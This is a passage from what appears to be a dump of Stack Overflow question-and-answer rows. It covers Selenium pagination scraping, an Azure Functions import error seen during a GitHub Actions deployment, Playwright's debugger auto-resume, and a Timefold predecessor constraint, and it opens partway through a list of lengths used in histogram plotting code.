360, 572, 198, 934, 1480, 948, 976, 899, 372, 459, 997, 165, 734, 455, 479, 480, 514, 504, 446, 504, 1620, 552, 1118, 485, 509, 892, 1025, 546, 777, 455, 445, 985, 474, 864, 302, 712, 283, 307, 432, 1075, 478, 732, 685, 375, 507, 1209, 1097, 2480, 477, 343, 432, 496, 465, 457, 768, 561, 660, 915, 661, 255, 217, 960, 265, 526, 672, 798, 357, 1692, 622, 465, 612, 228, 1086, 444, 261, 345, 238, 706, 240, 444, 288, 632, 528, 318, 401, 378, 192, 461, 528, 393, 486, 409, 831, 1019, 
745, 222, 216, 465, 839, 1399, 523, 461, 457, 388, 438, 1062, 351, 553, 814, 345, 494, 643, 307, 306, 252, 569, 534, 557, 372, 374, 344, 696, 351, 582, 903, 375, 432, 303, 743, 617, 459, 492, 495, 999, 284, 538, 291, 748, 742, 739, 449, 212, 261, 579, 1311, 1178, 330, 458, 276, 563, 467, 565, 578, 227, 178, 959, 642, 475, 1242, 325, 365, 360, 314, 523, 201, 569, 571, 351, 319, 298, 468, 1154, 351, 599, 574, 947, 480, 415, 770, 459, 263, 285, 281, 465, 1429, 498, 199, 345, 639, 261, 489, 314, 291, 692, 318, 351, 399, 275, 540, 542, 914, 492, 872, 231, 1324, 373, 270, 302, 479, 285, 381, 270, 410, 1366, 242, 698, 1044, 513, 1004, 951, 702, 796, 291, 282, 444, 734, 1669, 500, 350, 319, 1092, 239, 434, 266, 297, 323, 407, 252, 879, 893, 267, 222, 326, 311, 288, 680, 568, 477, 877, 408, 968, 888, 1497, 1312, 336, 279, 459, 876, 294, 324, 324, 801, 383, 225, 449, 609, 384, 738, 951, 312, 550, 810, 765, 377, 297, 179, 213, 320, 489, 797, 1637, 558, 616, 1907, 517, 556, 773, 669, 426, 432, 956, 336, 757, 353, 420, 462, 797, 475, 1124, 356, 579, 212, 472, 361, 408, 390, 470, 527, 637, 422, 474, 622, 533, 728, 985, 537, 606, 340, 754, 479, 851, 960, 453, 607, 518, 639, 495, 341, 411, 441, 609, 792, 287, 498, 458, 260, 195, 411, 1646, 375, 665, 243, 356, 426, 207, 362, 452, 339, 666, 852, 476, 312, 375, 284, 437, 673, 507, 332, 380, 747, 734, 431, 268, 243, 315, 221, 767, 894, 225, 362, 358, 919, 294, 396, 449, 179, 549, 435, 528, 479, 300, 436, 380, 523, 550, 255, 1043, 645, 402, 203, 479, 679, 478, 654, 769, 471, 418, 617, 342, 674, 993, 321, 615, 150, 204, 1033, 606, 759, 604, 828, 307, 273, 558, 234, 408, 548, 1238, 914, 978, 930, 269, 287, 390, 474, 248, 234, 714, 603, 471, 236, 383, 732, 356, 269, 461, 358, 197, 506, 465, 274, 618, 1309, 1638, 1154, 2222, 930, 1395, 1387, 765, 899, 291, 354, 872, 355, 273, 664, 426, 360, 683, 627, 609, 1230, 861, 6609, 549, 444, 240, 461, 234, 495, 571, 957, 342, 212, 1519, 396, 358, 1272, 1492, 615, 414, 472, 332, 335, 1060, 721, 477, 556, 654, 699, 654, 393, 921, 1651, 504, 710, 1083, 755, 246, 476, 270, 330, 618, 805, 571, 495, 391, 498, 1390, 444, 207, 615, 349, 548, 467, 301, 216, 473, 724, 744, 504, 673, 525, 670, 669, 1221, 288, 884, 462, 565, 434, 522, 455, 639, 1221, 301, 1223, 1029, 991, 491, 465, 434, 472, 392, 821, 719, 543, 246, 818, 913, 402, 535, 492, 492, 491, 534, 968, 886, 316, 541, 494, 409, 246, 435, 442, 989, 473, 790, 624, 398, 469, 273, 735, 328, 601, 627, 356, 344, 410, 1261, 495, 506, 518, 388, 624, 687, 237, 972, 476, 527, 1518, 479, 633, 675, 374, 573, 444, 357, 239, 581, 799, 308, 522, 758, 272, 171, 276, 879, 275, 455, 648, 252, 474, 303, 510, 348, 590, 1086, 504, 928, 530, 495, 1587, 239, 608, 326, 585, 373, 496, 482, 1158, 885, 333, 459, 370, 455, 893, 307, 468, 290, 604, 1198, 306, 1110, 922, 705, 418, 1441, 613, 401, 546, 354, 465, 1205, 328, 703, 570, 428, 232, 1292, 415, 1007, 1285, 1019, 968, 245, 606, 1284, 798, 1588, 1547, 606, 326, 506, 228, 1071, 429, 485, 1508, 625, 294, 330, 405, 343, 192, 452, 359, 222, 1282, 521, 461, 403, 735, 297, 1288, 606, 382, 339, 650, 918, 309, 724, 479, 439, 289, 364, 1683, 226, 1139, 372, 495, 741, 923, 464, 629, 266, 1186, 891, 429, 271, 224, 723, 408, 687, 763, 421, 398, 599, 918, 272, 610, 932, 247, 306, 1224, 594, 531, 349, 332, 405, 486, 406, 752, 441, 386, 368, 663, 350, 480, 1067, 368, 816, 468, 615, 976, 339, 332, 903, 357, 961, 970, 657, 942, 662, 400, 304, 858, 332, 238, 231, 327, 475, 1499, 432, 585, 392, 412, 594, 263, 381, 432, 1320, 269, 439, 465, 321, 718, 1059, 408, 1308, 392, 
856, 1255, 536, 339, 2192, 455, 1390, 715, 522, 980, 432, 320, 2766, 531, 697, 378, 717, 246, 590, 731, 976, 733, 177, 345, 588, 348, 1187, 318, 724, 705, 1146, 284, 610, 354, 298, 331, 693, 1210, 1470, 540, 612, 419, 1039, 574, 739, 1213, 1332, 296, 292, 493, 1046, 567, 662, 708, 233, 1123, 933, 624, 159, 492, 210, 473, 1153, 1489, 974, 669, 1281, 737, 729, 545, 532, 357, 565, 844, 939, 468, 878, 772, 773, 355, 469, 2315, 171, 654, 1063, 432, 1938, 270, 866, 716, 1022, 323, 330, 226, 285, 300, 896, 300, 659, 246, 1493, 231, 906, 294, 465, 533, 525, 363, 524, 891, 788, 270, 240, 723, 734, 2027, 474, 1327, 547, 589, 240, 465, 339, 614, 492, 486, 398, 639, 345, 974, 156, 664, 1544, 1367, 776, 610, 465, 519, 478, 1524, 640, 1431, 1288, 419, 189, 275, 651, 852, 939, 672, 316, 489, 456, 360, 921, 939, 446, 366, 384, 366, 266, 332, 492, 1479, 825, 460, 351, 549, 475, 740, 313, 357, 556, 618, 1039, 411, 234, 378, 567, 269, 990, 270, 573, 629, 996, 1107, 393, 480, 624, 583, 485, 1770, 323, 374, 484, 1128, 609, 379, 1426, 551, 1182, 680, 607, 472, 467, 1312, 468, 342, 473, 1279, 832, 408, 802, 764, 290, 668, 440, 1085, 492, 1523, 189, 329, 1334, 403, 285, 427, 653, 346, 1385, 197, 1281, 465, 468, 414, 981, 473, 879, 552, 246, 522, 610, 609, 255, 915, 2142, 624, 236, 892, 480, 944, 847, 674, 739, 275, 1139, 291, 815, 357, 387, 613, 160, 341, 630, 794, 3061, 552, 167, 447, 300, 471, 1182, 867, 424, 1104, 417, 648, 708, 700, 405, 399, 231, 246, 1588, 766, 1127, 611, 892, 604, 995, 657, 2170, 336, 492, 273, 874, 303, 487, 500, 967, 1380, 345, 300, 1863, 408, 446, 1269, 351, 1448, 570, 336, 487, 270, 270, 804, 833, 1384, 1235, 404, 285, 1499, 708, 834, 584, 309, 492, 528, 762, 624, 380, 323, 916, 403, 384, 409, 530, 241, 724, 1950, 645, 301, 386, 704, 708, 1389, 588, 693, 484, 469, 299, 467, 1119, 696, 610, 824, 231, 531, 321, 663, 177, 635, 573, 268, 711, 892, 513, 707, 872, 619, 576, 476, 506, 285, 594, 495, 564, 399, 387, 638, 536, 594, 772, 955, 672, 312, 305, 627, 774, 575, 1178, 1647, 390, 879, 563, 931, 464, 440, 515, 201, 499, 703, 738, 1372, 794, 712, 503, 1034, 618, 753, 225, 736, 688, 395, 345, 531, 695, 467, 1009, 789, 1659, 532, 913, 261, 359, 611, 660, 480, 555, 551, 849, 743, 1224, 841, 442, 408, 372, 625, 437, 825, 297, 375, 647, 304, 992, 722, 451, 684, 155, 780, 543, 340, 477, 1659, 2790, 480, 445, 457, 968, 360, 306, 676, 498, 603, 318, 724, 600, 265, 718, 381, 343, 776, 600, 600, 600, 600, 600, 600, 600, 597, 600, 597, 584, 255, 1539, 672, 1726, 179, 589, 326, 629, 626, 789, 440, 954, 537, 262, 3015, 405, 374, 381, 743, 272, 479, 640, 293, 359, 412, 959, 550, 1088, 492, 615, 279, 480, 864, 369, 491, 467, 343, 537, 723, 254, 567, 1049, 1313, 591, 311, 477, 1617, 744, 251, 299, 159, 461, 464, 1042, 668, 301, 771, 533, 280, 713, 544, 608, 493, 644, 344, 456, 560, 1110, 307, 290, 1069, 606, 717, 1167, 653, 356, 495, 1012, 432, 297, 1618, 405, 449, 405, 573, 565, 962, 364, 369, 910, 223, 245, 398, 495, 577, 616, 468, 620, 316, 230, 633, 334, 808, 543, 744, 935, 1004, 863, 615, 592, 429, 333, 204, 484, 287, 642, 930, 866, 997, 299, 290, 520, 342, 959, 588, 851, 629, 522, 537, 569, 336, 391, 462, 824, 474, 959, 760, 353, 348, 462, 1420, 1386, 1275, 548, 408, 600, 600, 600, 600, 402, 242, 1391, 1215, 573, 470, 1168, 476, 1712, 376, 868, 495, 379, 300, 1359, 1053, 662, 465, 526, 427, 543, 667, 322, 778, 1327, 435, 360, 507, 1079, 1201, 477, 403, 261, 673, 499, 580, 446, 908, 1490, 552, 269, 576, 616, 933, 961, 384, 236, 479, 255, 495, 483, 602, 354, 435, 650, 826, 455, 704, 246, 636, 1267, 
1201, 282, 567, 432, 2289, 666, 549, 162, 510, 748, 297, 372, 270, 699, 227, 412, 344, 470, 491, 1370, 403, 456, 246, 317, 335, 1379, 952, 456, 416, 519, 312, 656, 338, 863, 688, 340, 854, 666, 697, 742, 967, 587, 192, 462, 490, 337, 890, 1539, 244, 229, 536, 280, 264, 414, 438, 1311, 300, 884, 695, 1509, 798, 612, 611, 414, 533, 678, 426, 274, 466, 883, 864, 603, 873, 1398, 477, 495, 528, 767, 613, 304, 1419, 832, 488, 489, 1290, 648, 266, 1200, 957, 407, 507, 703, 715, 495, 305, 389, 949, 492, 1155, 693, 333, 464, 331, 769, 660, 1115, 403, 483, 899, 279, 371, 354, 361, 444, 552, 286, 248, 265, 662, 393, 2433, 766, 752, 326, 692, 1185, 1170, 678, 728, 432, 656, 1190, 510, 878, 366, 434, 297, 680, 735, 533, 935, 774, 692, 1162, 687, 540, 1417, 464, 339, 779, 471, 566, 281, 384, 271, 760, 698, 357, 513, 888, 475, 515, 216, 864, 303, 630, 425, 299, 562, 522, 1155, 457, 489, 812, 719, 405, 1313, 735, 255, 275, 384, 274, 1007, 289, 457, 1239, 368, 1148, 581, 351, 488, 712, 1097, 639, 478, 481, 630, 479, 493, 740, 1239, 366, 380, 1234, 358, 483, 824, 593, 994, 318, 465, 797, 715, 766, 333, 615, 693, 495, 366, 366, 420, 400, 381, 879, 431, 404, 645, 405, 451, 360, 263, 522, 315, 294, 610, 382, 1304, 417, 655, 824, 829, 463, 798, 453, 495, 264, 1122, 1476, 469, 285, 1098, 838, 430, 293, 418, 225, 260, 1004, 346, 552, 1383, 708, 1218, 348, 738, 358, 342, 303, 993, 597, 1048, 571, 448, 752, 581, 475, 803, 1209, 863, 385, 737, 435, 651, 982, 1286, 1175, 1172, 329, 582, 485, 1280, 338, 520, 308, 407, 330, 392, 420, 1595, 951, 454, 348, 482, 305, 1004, 498, 243, 768, 470, 1773, 770, 266, 543, 456, 622, 516, 773, 661, 368, 395, 364, 444, 506, 606, 1077, 429, 557, 478, 311, 1318, 2398, 724, 402, 435, 345, 511, 1004, 1119, 293, 365, 715, 360, 191, 955, 480, 954, 347, 421, 495, 416, 432, 457, 583, 484, 894, 918, 705, 471, 378, 499, 889, 1277, 624, 307, 1274, 405, 299, 430, 1449, 879, 374, 1078, 1326, 860, 586, 192, 1356, 815, 595, 817, 484, 476, 373, 416, 744, 526, 352, 207, 460, 542, 334, 332, 499, 702, 258, 951, 771, 1199, 372, 425, 459, 448, 542, 343, 270, 791, 969, 287, 316, 398, 460, 357, 270, 811, 741, 474, 374, 582, 869, 404, 409, 421, 581, 797, 1197, 225, 408, 366, 338, 1098, 474, 609, 1318, 568, 864, 813, 1560, 543, 312, 321, 305, 1125, 420, 771, 400, 302, 251, 476, 321, 1140, 405, 764, 390, 275, 317, 697, 447, 573, 348, 1829, 1062, 459, 361, 861, 1385, 1797, 1182, 477, 445, 552, 537, 359, 684, 1079, 342, 260, 519, 408, 827, 823, 456, 529, 1155, 291, 900, 730, 445, 564, 399, 1149, 488, 192, 658, 1520, 1024, 861, 1007, 455, 808, 750, 489, 411, 486, 382, 566, 354, 366, 542, 542, 413, 1056, 1056, 486, 793, 431, 790, 416, 610, 504, 491, 1393, 611, 392, 531, 588, 905, 820, 955, 1148, 782, 1104, 314, 744, 729, 428, 256, 680, 337, 372, 622, 289, 367, 676, 327, 465, 1311, 1101, 370, 401, 729, 302, 587, 378, 420, 1124, 450, 1387, 387, 240, 1232, 352, 589, 669, 1181, 405, 656, 1185, 946, 610, 1696, 610, 294, 537, 381, 646, 393, 325, 274, 300, 449, 669, 342, 551, 1329, 473, 398, 1222, 881, 651, 234, 467, 682, 457, 905, 292, 330, 726, 291, 312, 438, 393, 477, 1494, 188, 369, 491, 394, 539, 674, 569, 531, 342, 770, 347, 279, 510, 360, 346, 959, 661, 315, 406, 813, 527, 517, 568, 373, 417, 429, 330, 572, 638, 210, 266, 894, 746, 344, 459, 772, 261, 339, 876, 575, 317, 1534, 707, 1141, 405, 1104, 282, 954, 441, 573, 656, 255, 444, 610, 1696, 207, 610, 610, 648, 548, 948, 641, 344, 505, 397, 388, 1859, 488, 251, 320, 314, 408, 180, 956, 776, 823, 645, 585, 373, 338, 666, 354, 537, 462, 865, 303, 1098, 602, 501, 
714, 766, 348, 534, 446, 534, 1176, 1158, 412, 989, 360, 2165, 971, 993, 240, 606, 1554, 216, 387, 749, 384, 467, 654, 685, 954, 608, 299, 2270, 1178, 460, 548, 753, 399, 310, 837, 709, 259, 456, 351, 299, 950, 759, 178, 1072, 824, 198, 354, 608, 484, 717, 154, 598, 300, 303, 252, 565, 526, 381, 520, 384, 339, 461, 353, 391, 438, 450, 474, 228, 477, 623, 1196, 269, 341, 559, 468, 492, 528, 254, 1341, 545, 1276, 483, 794, 990, 742, 258, 341, 521, 714, 1234, 437, 1169, 660, 409, 873, 317, 1230, 1029, 1243, 390, 463, 335, 405, 1166, 357, 495, 530, 732, 330, 1368, 330, 330, 1368, 331, 930, 903, 801, 901, 1443, 324, 1444, 1443, 905, 324, 927, 2911, 468, 295, 370, 744, 235, 453, 355, 809, 1494, 168, 480, 494, 1102, 374, 480, 262, 563, 1844, 893, 180, 445, 588, 662, 746, 1482, 1054, 4866, 1377, 560, 726, 292, 377, 315, 1836, 782, 357, 1171, 190, 648, 715, 582, 1386, 540, 336, 482, 607, 361, 542, 357, 276, 1278, 593, 1019, 548, 1390, 552, 465, 372, 1283, 1281, 895, 751, 301, 261, 771, 428, 1206, 441, 1546, 285, 479, 902, 459, 603, 1187, 855, 856, 1444, 903, 930, 334, 856, 334, 856, 334, 1369, 331, 1368, 928, 324, 903, 494, 355, 450, 747, 410, 659, 477, 657, 2609, 477, 991, 930, 944, 464, 645, 476, 347, 849, 327, 445, 729, 486, 198, 369, 232, 396, 480, 269, 426, 351, 249, 803, 475, 228, 266, 844, 393, 516, 779, 483, 374, 561, 368, 374, 203, 494, 1443, 334, 856, 494, 1045, 894, 593, 590, 1086, 504, 928, 265, 312, 465, 408, 493, 265, 1625, 968, 1234, 348, 459, 1098, 318, 621, 549, 785, 1218, 585, 438, 1476, 230, 688, 584, 812, 423, 525, 459, 324, 981, 509, 323, 530, 466, 553, 462, 285, 1275, 402, 756, 1586, 588, 1004, 1170, 555, 426, 288, 605, 699, 1493, 621, 1746, 1023, 502, 375, 1028, 855, 581, 327, 162, 200, 201, 399, 435, 482, 690, 1173, 409, 836, 1526, 1020, 1088, 330, 315, 480, 593, 522, 444, 210, 739, 1900, 778, 847, 711, 219, 300, 303, 1109, 1283, 461, 860, 834, 778, 944, 282, 523, 593, 833, 564, 595, 534, 530, 582, 315, 1236, 1307, 939, 496, 667, 378, 1205, 174, 1331, 443, 479, 648, 857, 1285, 1071, 372, 1116, 577, 646, 645, 759, 1137, 819, 1577, 201, 374, 314, 736, 463, 1179, 491, 588, 953, 528, 392, 1367, 747, 344, 1762, 1048, 1070, 563, 474, 374, 327, 621, 596, 536, 260, 452, 576, 1476, 675, 824, 603, 511, 2064, 405, 548, 388, 1227, 368, 504, 1002, 327, 1544, 728, 906, 880, 405, 477, 585, 1141, 544, 530, 704, 1583, 1006, 422, 657, 1140, 482, 879, 750, 408, 951, 870, 488, 850, 537, 561, 555, 444, 822, 662, 333, 1993, 420, 406, 674, 644, 1392, 1031, 616, 815, 1180, 677, 861, 855, 251, 213, 375, 890, 200, 162, 1195, 1035, 388, 1224, 3684, 1002, 2398, 311, 355, 1626, 674, 626, 663, 646, 528, 1217, 348, 2272, 966, 658, 981, 511, 1121, 760, 312, 566, 961, 1659, 374, 480, 782, 1190, 324, 1140, 1254, 1513, 414, 1015, 1151, 786, 1122, 1642, 316, 476, 393, 1264, 530, 757, 716, 1019, 447, 279, 576, 681, 661, 1827, 267, 852, 738, 992, 1106, 1284, 234, 859, 692, 738, 1263, 473, 1122, 590, 307, 444, 529, 1217, 435, 1910, 1234, 1122, 473, 216, 678\] plt.figure(figsize=(16, 8)) sns.histplot( data=df, x='len', bins=200, kde=True, color='purple', multiple='stack', edgecolor='none' ) mode_val = df['len'].mode()[0] mode_count = df['len'].value_counts()[mode_val] plt.text(mode_val, mode_count + 1, str(mode_val), color='white', ha='center', fontsize=10, fontweight='bold', bbox=dict(facecolor='indigo', alpha=0.8)) plt.xlabel('len') plt.ylabel('count') plt.title('Length Distribution with KDE') plt.grid(False) plt.tight_layout() plt.show() | 1 | 2 |
79,572,584 | 2025-4-14 | https://stackoverflow.com/questions/79572584/do-i-need-a-local-install-of-firefox-if-using-firefox-driver-in-selenium | I'm using Librewolf as my personal browser, in my script I'm using Firefox driver, do I need to install Firefox in my machine in order for the driver to work "better"? I have a Python + Selenium app to get URL data from a website, it has 35 pages, the script worked for the first 2 pages, on the third gave me en error (class attribute missing). Do I need to give it more wait time? The attribute I'm trying to get is FS03250425_BCN03A20 from <div class="costa-itinerary-tile FS03250425_BCN03A20" data-cc-cruise-id="FS03250425_BCN03A20"> Is there a better way to do it? And this is the code I'm using select_url_css = "data-cc-cruise-id" select_tile_css = "div.costa-itinerary-tile" element = WebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.CSS_SELECTOR, select_tile_css))) elements = driver.find_elements(By.CSS_SELECTOR, select_tile_css) for element in elements: url_raw = element.get_attribute(select_url_css) | You have asked two questions. Am answering the second one, which is about scraping 35 pages. Your selenium script needs to navigate to individual page and scrape the data. In the code below, I have used a while loop to click on the Next Page and scrape the data until the last page is reached. NOTE: Keep in mind that selenium is not the fastest way to achieve this, as selenium imitates human action and manually scrapes page by page which takes time. Code: from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium import webdriver import time options = webdriver.FirefoxOptions() # options.add_argument("--headless") # Run headless if you wish driver = webdriver.Firefox(options=options) driver.get("https://www.costacruises.eu/cruises.html?page=1#occupancy_EUR_anonymous=A&guestAges=30&guestBirthdates=1995-04-10&%7B!tag=destinationTag%7DdestinationIds=ME&%7B!tag=embarkTag%7DembarkPortCode=BCN,ALC,VLC") driver.maximize_window() wait = WebDriverWait(driver, 10) # Below try catch code is to handle the cookie consent pop-up. If you are not getting this pop-up, you can remove this code. try: wait.until(EC.element_to_be_clickable((By.XPATH, "//button[text()='Accept']"))).click() except Exception as e: print("Accept button not found or not clickable:", e) cruise_ids = [] while True: try: # Wait for cruise tiles on the current page elements = wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, "div.costa-itinerary-tile"))) # Collect cruise IDs on current page for element in elements: cruise_id = element.get_attribute("data-cc-cruise-id") if cruise_id and cruise_id not in cruise_ids: cruise_ids.append(cruise_id) # Below code will locate and store the next button in a list. And then clicks it only if it's enabled. 
next_button = wait.until(EC.visibility_of_all_elements_located((By.XPATH, "//a[@aria-label='Next page']"))) # If the next button is disabled, break the loop if not next_button[0].is_enabled(): break next_button[0].click() # Wait for content to load time.sleep(2) except Exception as e: break print("Collected Cruise IDs:") print(cruise_ids) Output: Collected Cruise IDs: ['FS04250428_BCN04A28', 'FS03250425_BCN03A20', 'FS03261103_BCN03A2W', 'TO03260409_BCN03A3D', 'FS03261020_BCN03306', 'FS03261027_BCN03A2U', 'SM07250427_BCN07A1B', 'SM07250504_BCN07A1B', 'SM07260126_BCN07A4U', 'PA05260401_VLC05A05', 'SM07250525_BCN07A3O', 'SM07251109_BCN07A3P', 'DI03250926_BCN03A2G', 'SM08251214_BCN08A0I', 'PA07251027_BCN07A45', 'SM07251102_BCN07A3P', 'TO07260419_BCN07A3M', 'TO07261025_BCN07A3M', 'PA07260520_VLC07A31', 'PA07260527_VLC07A32', 'PA07251006_VLC07A2Y', 'SM07261102_BCN07A4Y', 'TO07261018_BCN07A3M', 'PA07260603_ALC07A01', 'SM07250914_BCN07A3P', 'SM07250601_BCN07A3O', 'SM07260427_BCN07A4W', 'SM07260518_BCN07A4V', 'SM07260525_BCN07A4V', 'TO07260920_BCN07A3M', 'PA07250602_VLC07A2S', 'TO07250909_BCN07A4O'] Process finished with exit code 0 | 1 | 1 |
79,569,153 | 2025-4-11 | https://stackoverflow.com/questions/79569153/module-not-found-azure-data-when-deploying-azure-function-works-locally | I am building a python function. When I run it locally, everything works as expected. When I try to deploy it (using GitHub Actions), the deployment is successful, but the function can not be started, because it throws an error. As you can see in the following picture, the build process works fine and I can run the function_app.py in the generated folder, when extracting the zip. However, when I look into the azure function logs, I see that the function has been started with 0 routes mapped. Here are the logs from the function startup: 4/11/2025, 2:42:50.361 PM Job host started 1 4/11/2025, 2:42:49.565 PM Initializing Warmup Extension. 1 4/11/2025, 2:42:49.571 PM Initializing Host. OperationId: '1393eee4-b797-4b1e-ba9f-7863e0b9f902'. 1 4/11/2025, 2:42:49.571 PM Host initialization: ConsecutiveErrors=0, StartupCount=3, OperationId=1393eee4-b797-4b1e-ba9f-7863e0b9f902 1 4/11/2025, 2:42:49.575 PM Traceback (most recent call last): 1 4/11/2025, 2:42:49.575 PM File "/azure-functions-host/workers/python/3.11/LINUX/X64/azure_functions_worker/utils/wrappers.py", line 44, in call 1 4/11/2025, 2:42:49.575 PM return func(*args, **kwargs) 1 4/11/2025, 2:42:49.575 PM ^^^^^^^^^^^^^^^^^^^^^ 1 4/11/2025, 2:42:49.575 PM File "/azure-functions-host/workers/python/3.11/LINUX/X64/azure_functions_worker/loader.py", line 244, in index_function_app 1 4/11/2025, 2:42:49.575 PM imported_module = importlib.import_module(module_name) 1 4/11/2025, 2:42:49.575 PM ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 1 4/11/2025, 2:42:49.575 PM File "/usr/local/lib/python3.11/importlib/__init__.py", line 126, in import_module 1 4/11/2025, 2:42:49.575 PM return _bootstrap._gcd_import(name[level:], package, level) 1 4/11/2025, 2:42:49.575 PM ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 1 4/11/2025, 2:42:49.575 PM File "<frozen importlib._bootstrap>", line 1204, in _gcd_import 1 4/11/2025, 2:42:49.575 PM File "<frozen importlib._bootstrap>", line 1176, in _find_and_load 1 4/11/2025, 2:42:49.575 PM File "<frozen importlib._bootstrap>", line 1147, in _find_and_load_unlocked 1 4/11/2025, 2:42:49.575 PM File "<frozen importlib._bootstrap>", line 690, in _load_unlocked 1 4/11/2025, 2:42:49.575 PM File "<frozen importlib._bootstrap_external>", line 940, in exec_module 1 4/11/2025, 2:42:49.575 PM File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed 1 4/11/2025, 2:42:49.575 PM File "/home/site/wwwroot/function_app.py", line 4, in <module> 1 4/11/2025, 2:42:49.575 PM from azure.data.tables import TableClient, TableServiceClient 1 4/11/2025, 2:42:49.575 PM ModuleNotFoundError: No module named 'azure.data' 3 What's the problem here? The function does start up, but gets caught on line 4 of the function_app.py - here's the line in code: from azure.data.tables import TableClient, TableServiceClient Really appreciate any insights here PS: of course the dependency is listed in requirements.txt in case you were wondering - that's why it also runs anywhere else but when deployed. 
Edit: The workflow file is this: # Docs for the Azure Web Apps Deploy action: https://github.com/azure/functions-action # More GitHub Actions for Azure: https://github.com/Azure/actions # More info on Python, GitHub Actions, and Azure Functions: https://aka.ms/python-webapps-actions name: Deploy on: push: branches: - test workflow_dispatch: env: AZURE_FUNCTIONAPP_PACKAGE_PATH: './api' # set this to the path to your web app project, defaults to the repository root PYTHON_VERSION: '3.11' # set this to the python version to use (supports 3.6, 3.7, 3.8) AZURE_STORAGE_CONNECTION_STRING: ${{ secrets.AZURE_STORAGE_CONNECTION_STRING }} AZURE_COSMOS_CONNECTION_STRING: ${{ secrets.AZURE_COSMOS_CONNECTION_STRING }} jobs: build: runs-on: ubuntu-latest permissions: contents: read #This is required for actions/checkout steps: - name: Checkout repository uses: actions/checkout@v4 - name: Setup Python version uses: actions/setup-python@v5 with: python-version: ${{ env.PYTHON_VERSION }} - name: Copy /shared to /api run: cp -r ./shared ./api/ - name: Create and start virtual environment run: | python3 -m venv venv source venv/bin/activate - name: Install dependencies (api) run: pip3 install -r ./api/requirements.txt # Optional: Add step to run tests here - name: Test function app run: python3 ./api/function_app.py # end of tests - name: Zip artifact for deployment run: zip release.zip ./api/* -r - name: Upload artifact for deployment job uses: actions/upload-artifact@v4 with: name: python-app path: | release.zip deploy: runs-on: ubuntu-latest needs: build steps: - name: Download artifact from build job uses: actions/download-artifact@v4 with: name: python-app - name: Unzip artifact for deployment run: unzip release.zip - name: 'Deploy to Azure Functions' uses: Azure/functions-action@v1 id: deploy-to-function with: app-name: 'my_app' slot-name: 'Production' package: ${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }} publish-profile: ${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_XXXXXXXX }} sku: 'flexconsumption' | I got it to work on a FLEX Consumption plan. I deployed the exact same zip file (using azure cli) to two functions, one one FLEX and one on normal consumption plan. On the Consumption plan it still produces the original error, module not found, while on the flex plan it deploys successfully. must be a bug | 1 | 0 |
79,572,155 | 2025-4-13 | https://stackoverflow.com/questions/79572155/how-to-automatically-start-the-debugging-session-in-playwright | I want to automatically start the debugging session instead of having it start paused. I found out that adding this code makes it work, but it feels hackish to me: context.add_init_script("setTimeout(window.__pw_resume, 500)") Without the setTimeout, it won’t work. Am I doing anything wrong? | __pw_resume isn’t defined immediately, so a short delay is needed. As of now, there’s no official setting to start unpaused, so this workaround is necessary. | 1 | 2 |
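For context, this is roughly where the asker's workaround sits in a full script; a minimal sketch assuming the sync API and Chromium (the 500 ms delay is the value from the question, and the URL is a placeholder):

from playwright.sync_api import sync_playwright

with sync_playwright() as p:
    browser = p.chromium.launch()
    context = browser.new_context()
    # the workaround from the question: window.__pw_resume is not defined the
    # instant the init script runs, so call it after a short delay to auto-resume
    context.add_init_script("setTimeout(window.__pw_resume, 500)")
    page = context.new_page()
    page.goto("https://example.com")
    browser.close()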
79,568,397 | 2025-4-11 | https://stackoverflow.com/questions/79568397/setting-a-predecessor-constraint-in-timefold-python | I am trying to implement a predecessor constraint similar to the Job Scheduling example given in java. But I struggle with the ordering constraint definition to consider predecessors. I have defined my time slots simply as ordered integers : @dataclass class Timeslot: slot : int And my operations as planning entities with few boolean operations and predecessors as a list of other operations id : @planning_entity @dataclass class Operation: id: Annotated[int, PlanningId] name: str predecessors: list[int] timeslot: Annotated[Timeslot, PlanningVariable] = field(default=None) def isPred(self,other): return other.id in self.predecessors def isAfter(self,other): return self.timeslot.slot < other.timeslot.slot And then my constraint as : def precondition_conflict(constraint_factory: ConstraintFactory) -> Constraint: # Respect order constraints return ( constraint_factory.for_each_unique_pair(Operation) .filter(lambda op1, op2 : op1.isPred(op2)) .filter(lambda op1, op2 : op1.isAfter(op2)) .penalize(HardSoftScore.ONE_HARD) .as_constraint("Order conflict") ) Then I instanciate my problem : operations.append(Operation(1,"OP N°1 : Bake the cake",[3])) operations.append(Operation(2,"OP N°2 : Enjoy your meal",[4])) operations.append(Operation(3,"OP N°3 : Mix flour, eggs and whatever they say in the recipe",[])) operations.append(Operation(4,"OP N°4 : take it out of the oven",[1])) But the solver keeps giving me solutions where the operations order is incorrect, with 0 hard constraint violated. For instance : INFO:timefold.solver:Solving ended: time spent (30056), best score (0hard/0soft), move evaluation speed (219895/sec), phase total (2), environment mode (PHASE_ASSERT), move thread count (NONE). INFO:app:+------------------+------------------+ INFO:app:|0 |OP N°4 : take it out of the oven| INFO:app:+------------------+------------------+ INFO:app:|1 |OP N°2 : Enjoy your meal| INFO:app:+------------------+------------------+ INFO:app:|2 |OP N°3 : Mix flour, eggs and whatever they say in the recipe| INFO:app:+------------------+------------------+ INFO:app:|3 |OP N°1 : Bake the cake| INFO:app:+------------------+------------------+ Where obviously I expected 3 -> 1 -> 4 -> 2 Where did I do it wrong? SOLUTION (thanks to Lukáš Petrovický): def precondition_conflict(constraint_factory: ConstraintFactory) -> Constraint: # Respect order constraints return ( constraint_factory.for_each(Operation) .join(Operation) .filter(lambda op1, op2 : op1.isPred(op2)) .filter(lambda op1, op2 : op1.isAfter(op2)) .penalize(HardSoftScore.ONE_HARD) .as_constraint("Order conflict") ) | Unique pairs are tricky. In this case, you probably want to avoid using them, and instead go for a standard join. Consider three operations: A, B, C. Unique pairs will give you A+B, A+C and B+C. It assumes that whatever is true for A+B, it is also true for B+A and therefore processing both would be redundant. But this is not true in your case. A standard join would fix it, enumerating all possible pairs. Or a better filter, which checks the condition from both sides. | 1 | 2 |
